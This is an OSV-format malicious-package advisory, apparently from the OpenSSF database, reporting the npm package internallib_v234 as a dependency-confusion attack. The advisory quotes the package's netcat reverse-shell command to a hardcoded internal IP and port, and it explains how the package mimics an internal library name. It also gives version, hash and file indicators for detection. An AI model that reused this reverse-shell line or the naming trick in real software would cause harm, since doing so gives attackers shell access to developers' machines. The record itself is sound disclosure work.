{"id":"MAL-2026-6796","summary":"Malicious code in internallib_v234 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087)\ninternallib_v234@1.0.6 exports a `command()` function whose body unconditionally invokes `/bin/bash -c \"nc -vn 10.0.74.133 13337 -e /bin/bash\"`, opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs `whereis nc` to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency (`internallib_v234: ^1.0.0`), and CI configuration references a private Verdaccio registry (`npm update --registry http://0.0.0.0:4873/`). The combination indicates a targeted attack against an organization that hosts a private `internallib_v234` internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.\n","modified":"2026-07-06T06:46:42.990767214Z","published":"2026-07-06T05:28:03Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-07-06T06:35:49.401481717Z","id":"IN-MAL-2026-008038","versions":["1.0.3"],"source":"amazon-inspector","sha256":"04c12e7b603e60e2fdbd050a2a9b15b4061040b31bbb6bdf6d90b2295fd9a47e","modified_time":"2026-07-06T05:28:11Z"},{"import_time":"2026-07-06T06:35:49.521753011Z","id":"IN-MAL-2026-008040","versions":["1.0.5"],"source":"amazon-inspector","sha256":"d907ff37eec91a2e89c95755697ca2765def0877cf48afd76e5126cffa7cf02e","modified_time":"2026-07-06T05:28:27Z"},{"import_time":"2026-07-06T06:35:49.469873614Z","id":"IN-MAL-2026-008039","versions":["1.0.6"],"source":"amazon-inspector","modified_time":"2026-07-06T05:28:18Z","sha256":"8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087"},{"import_time":"2026-07-06T06:35:49.338564124Z","id":"IN-MAL-2026-008037","versions":["1.0.7"],"source":"amazon-inspector","sha256":"c81ea4974b3fc3c86e91ae44b3f9d618b24d1849da30ac74427884b51142eacf","modified_time":"2026-07-06T05:28:03Z"},{"import_time":"2026-07-06T06:35:49.591623935Z","id":"IN-MAL-2026-008041","versions":["1.0.4"],"source":"amazon-inspector","sha256":"d0a13bb05b557bb0d0570548da606cf43184f0f80870d95f14299e0437de8c71","modified_time":"2026-07-06T05:28:35Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v234/v/1.0.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v234/v/1.0.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v234/v/1.0.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v234/v/1.0.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v234/v/1.0.4"}],"affected":[{"package":{"name":"internallib_v234","ecosystem":"npm","purl":"pkg:npm/internallib_v234"},"versions":["1.0.3","1.0.5","1.0.6","1.0.7","1.0.4"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v234/MAL-2026-6796.json","indicators":{"evidence_files":[{"path":"index.js","tlsh":"41c022a785960b2ab70822e09c01f862a8438c703a3c40b0e0888151009384e66470bf","sha256":"c7c173225ff214d98f2f754db88502220b38835aba3e4c89d9b3ffc09f2ceeb0"},{"path":"package.json","tlsh":"26d02e200d235cb321c5036a2c69801372608e3f004abc0c9bcb0a2c40cf2b7a8fd30c","sha256":"272b710ae50ce4eb6bd1f2dcefc2fb59c5482be4d9cd058d06f848901ce44dd2"}],"package_integrity":[{"hashes":{"sha1":"56fe81a96d30078411d388c477a96bcd9586b1ce","sha512_sri":"sha512-oPEsIlX6Qr9Iv1H9KWUiU7SSn/sCvXAek/GLl9ErcQTkY2IgvwptTCIqxc0n+iVhGWh5TyAZ0DEuXdVsxF4b/Q=="},"filename":"internallib_v234-1.0.3.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}